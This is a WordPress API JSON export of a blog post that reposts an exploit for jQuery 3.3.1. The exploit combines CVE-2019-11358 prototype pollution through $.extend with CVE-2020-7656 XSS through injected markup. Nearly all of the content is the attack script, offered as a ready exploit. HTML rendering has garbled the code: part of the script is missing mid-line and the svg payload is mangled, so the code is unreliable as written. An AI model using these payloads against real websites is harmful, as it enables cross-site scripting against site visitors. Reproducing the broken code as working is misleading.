{"id":62575,"date":"2025-04-08T15:40:21","date_gmt":"2025-04-08T12:10:21","guid":{"rendered":"https:\/\/afaghhosting.net\/blog\/jquery-3-3-1-prototype-pollution-xss-exploit\/"},"modified":"2025-04-08T15:40:21","modified_gmt":"2025-04-08T12:10:21","slug":"jquery-3-3-1-prototype-pollution-xss-exploit","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/jquery-3-3-1-prototype-pollution-xss-exploit\/","title":{"rendered":"jQuery 3.3.1 &#8211; Prototype Pollution &#038; XSS Exploit"},"content":{"rendered":"<p><\/p>\n<div>\n<pre><code class=\"language-txt\" style=\"white-space: pre-wrap;\"># Exploit Title: jQuery Prototype Pollution &amp; XSS Exploit (CVE-2019-11358 &amp; CVE-2020-7656)&#13;\n# Google Dork: N\/A&#13;\n# Date: 2025-02-13&#13;\n# Exploit Author: xOryus&#13;\n# Vendor Homepage: https:\/\/jquery.com&#13;\n# Software Link: https:\/\/code.jquery.com\/jquery-3.3.1.min.js&#13;\n# Version: 3.3.1&#13;\n# Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112&#13;\n# CVE : CVE-2019-11358, CVE-2020-7656&#13;\n# Category: WebApps&#13;\n&#13;\n# Description:&#13;\n# This exploit abuses two vulnerabilities in jQuery:&#13;\n# - CVE-2020-7656: XSS via improper script handling&#13;\n# - CVE-2019-11358: Prototype Pollution leading to XSS&#13;\n# By injecting payloads into a vulnerable page using jQuery alert('XSS via CVE-2020-7656: ' + document.domain)\"; \/\/ Space after &#13;\n    $('body').append(maliciousContent);&#13;\n    console.log(\"[+] XSS payload (CVE-2020-7656) injected. Alert will be displayed.\");&#13;\n&#13;\n    \/\/ 4. 
Exploit Prototype Pollution (CVE-2019-11358)&#13;\n    const defaultConfig = {&#13;\n        \"backLink\": \"<a href=\"'https:\/\/example.com'\">Go Back<\/a>\"&#13;\n    };&#13;\n&#13;\n    const maliciousParams = {&#13;\n        \"__proto__\": {&#13;\n            \"backLink\": \"<svg onload=\"alert('XSS\" via=\"\" cve-2019-11358:=\"\" prototype=\"\" pollution=\"\">\"&#13;\n        }&#13;\n    };&#13;\n&#13;\n    \/\/ 5. Merge objects using vulnerable $.extend&#13;\n    let config = $.extend(true, defaultConfig, maliciousParams);&#13;\n    console.log(\"[+] Prototype Pollution executed via $.extend().\");&#13;\n&#13;\n    \/\/ 6. Create a container to inject malicious content&#13;\n    const container = document.createElement('div');&#13;\n    container.id = 'backLinkContainer';&#13;\n    document.body.appendChild(container);&#13;\n&#13;\n    \/\/ 7. Inject malicious content into the DOM&#13;\n    $('#backLinkContainer').html(config.backLink);&#13;\n    console.log(\"[+] XSS payload (CVE-2019-11358) injected into the DOM. Alert will be displayed.\");&#13;\n};&#13;\n&#13;\n\/\/ 8. Instruction message&#13;\nconsole.log(\"[*] Script injected. 
Waiting for jQuery to load...\");\n            <\/svg><\/code><\/pre>\n<\/p><\/div>\n<p><a href=\"https:\/\/afaghhosting.net\">\u0622\u0641\u0627\u0642 \u0647\u0627\u0633\u062a\u06cc\u0646\u06af \u0645\u062f\u06cc\u0631\u06cc\u062a \u0633\u0631\u0648\u0631 \u0645\u0634\u0627\u0648\u0631 \u0648 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646 \u0641\u0646\u06cc <\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: jQuery Prototype Pollution &amp; XSS Exploit (CVE-2019-11358 &amp; CVE-2020-7656)&#13; # Google Dork: N\/A&#13; # Date: 2025-02-13&#13; # Exploit Author: xOryus&#13; # Vendor Homepage: https:\/\/jquery.com&#13; # Software Link: https:\/\/code.jquery.com\/jquery-3.3.1.min.js&#13; # Version: 3.3.1&#13; # Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112&#13; # CVE : CVE-2019-11358, CVE-2020-7656&#13; # Category: WebApps&#13; &#13; # &hellip;<\/p>\n","protected":false},"author":1,"featured_media":62562,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-62575","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/62575","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=62575"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/62575\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media\/62562"}],"wp:attachment":[{"href":"ht
tps:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=62575"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=62575"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=62575"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}